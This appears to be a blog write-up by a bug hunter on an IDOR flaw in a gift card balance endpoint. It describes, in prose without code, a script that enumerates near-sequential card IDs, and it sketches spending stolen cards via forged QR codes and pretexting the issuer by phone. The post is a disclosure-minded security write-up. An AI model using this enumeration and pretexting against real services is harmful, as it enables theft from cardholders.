Open in app

Sign in

Write

Sign in

$20,000+ in Leaked Gift Cards – IDOR Writeup

Jacob Masse
4 min readFeb 1, 2025

--

Introduction

Over the holidays, I received a gift card as a present for a local sushi place. A few weeks later, I went out for sushi with some friends and noticed that the way the gift card was redeemed in the restaurant was odd. Our waitress took the card and scanned a QR code on the back of the gift card to pay, which I found weird. After I got home, I curiously scanned the QR code to see what this led to. This is where it started.

The Setup

Each gift card is 17 digits long and split into three sections. The three sections may mean different things or vary based on region or store, but I have not confirmed this yet. The company issues gift cards (open and closed loop) to various restaurants and online shops that are compatible with almost every POS system.

This opens a large attack surface of different places and customers that may be affected by this exploit.

The Exploit

When the QR code is scanned on the back of the gift card, it leads to a URL something like this:

https://example.com/checkcardbalanceonipad?acctID=XXXXXXXXXXXXXXXXX

Remember that this is the ONLY method by which funds are deducted from the card. There is no PIN or secondary authentication. Any merchant can scan a QR code for their store, or sometimes for other stores (open loop gift cards), and deduct funds from the card towards a purchase.

Upon further investigation, I concluded that there was no rate limiting in place or any firewall to prevent attacks on this critical endpoint and worst of all, the gift card account IDs are near-sequential :(

When you request a balance for an ID through the endpoint, one of two things can happen:

  • Valid Cards: The balance is shown (ex: “Gift: $50”)
  • Invalid Cards: An error message is displayed (ex: “No Balance Available for this Account”)

The Script + Results

Using this information discovered about the two things that can happen when querying a gift card, combined with knowledge of the near-sequential IDs and lack of rate limiting, we can make a simple Python script to query this endpoint and reveal every active customer gift card.

The script works like this:

  • Using the requests library, the script queries https://example.com/checkcardbalanceonipad?acctID={bruteForceGiftCardID}
  • bruteForceGiftCardID is a variable ranging from a set of possible gift card codes. It starts at the beginning of my gift card number set (which I know is a valid range) and increments by one for each request. One could likely start earlier and find more gift cards than I saw, but I am just looking for a POC.
  • The script makes each request and checks the response page content for a dollar sign (indicating a valid card) or the “No Balance Available for this Account” message (indicating an invalid card).
  • Valid gift card codes are printed.

After only running the script for 30 minutes, I discovered over $20,000 worth of valid gift cards, affecting over 300 customers. Keep in mind that this is only from the gift card range I was checking, and I started halfway through that range. More gift cards can be found through the different ranges, even in the range I was querying.

Potential Attack Scenario

Since we know that only a QR code with the gift card ID (acctID) is needed to make any transaction without further authorization, we could craft a QR code with anyone’s gift card ID discovered through the script and use it in-store/in restaurants to pay. Unsuspecting customers will use their gift cards to find the balance empty without explanation. It is even easier for online orders as you don’t have to make a QR code. You can use the code you found with the script when checking out your card.

If an attacker wanted to find out which store a gift card was for, they could quickly call the gift card company, posing as a customer, saying they found some old gift card codes in storage and would like to know the balance and where they could use them, and the company would likely oblige and give up this information as the gift card account ID is the only form of authentication ever used. If you have the ID, you own the gift card.

Moving Forward

I contacted the company asking where I could report a critical security vulnerability, as they did not have a bug bounty or VDP.

I am waiting for an answer from them, and I will update this article on their resolution once I submit my report :)

Bug Hunting
Idor
Gift Card Giveaway
Cybersecurity
Penetration Testing

--

--

Jacob Masse
Jacob Masse

Written by Jacob Masse

44 Followers
15 Following

Developer | Pentester | Director of Operations @ TrazTech Solutions LLC https://www.linkedin.com/in/jacob-masse-836371226/

Responses (1)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams